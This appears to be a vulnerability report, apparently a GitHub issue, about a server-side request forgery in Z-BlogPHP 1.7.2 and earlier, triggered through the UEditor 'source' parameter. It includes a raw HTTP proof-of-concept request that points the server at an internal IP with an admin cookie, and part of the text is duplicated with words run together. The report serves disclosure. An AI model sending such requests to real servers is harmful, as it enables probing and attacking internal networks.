A Server-Side Request Forgery (SSRF) in action_crawler.php file of Z-BlogPHP allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the source parameter.
Test Environment: Ubuntu and PHP 7.2
Impact version: Z-BlogPHP <= 1.7.2
Because the source parameter is unrestricted, it is also possible to use the server side to send requests, such as probing intranet web services. The corresponding PoC is as follows
GET /zblog/zb_users/plugin/UEditor/php/controller.php?action=catchimage&source[1]=http://172.16.119.1/zfuzz HTTP/1.1
Host: 172.16.119.145
Cookie: timezone=8; username=admin; token=eec828fbf6857c2620e0bcd3d128a142e225dbaaac76572657c30d36b0df0a861665059400; addinfozblog=%7B%22chkadmin%22%3A1%2C%22chkarticle%22%3A1%2C%22levelname%22%3A%22%5Cu7ba1%5Cu7406%5Cu5458%22%2C%22userid%22%3A%221%22%2C%22useralias%22%3A%22admin%22%7D
Connection: close
You can also use the following curl command to verify the vulnerability
A Server-Side Request Forgery (SSRF) in action_crawler.php file of Z-BlogPHP allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the
sourceparameter.Test Environment: Ubuntu and PHP 7.2
Impact version: Z-BlogPHP <= 1.7.2
Because the
sourceparameter is unrestricted, it is also possible to use the server side to send requests, such as probing intranet web services. The corresponding PoC is as followsYou can also use the following curl command to verify the vulnerability
The text was updated successfully, but these errors were encountered: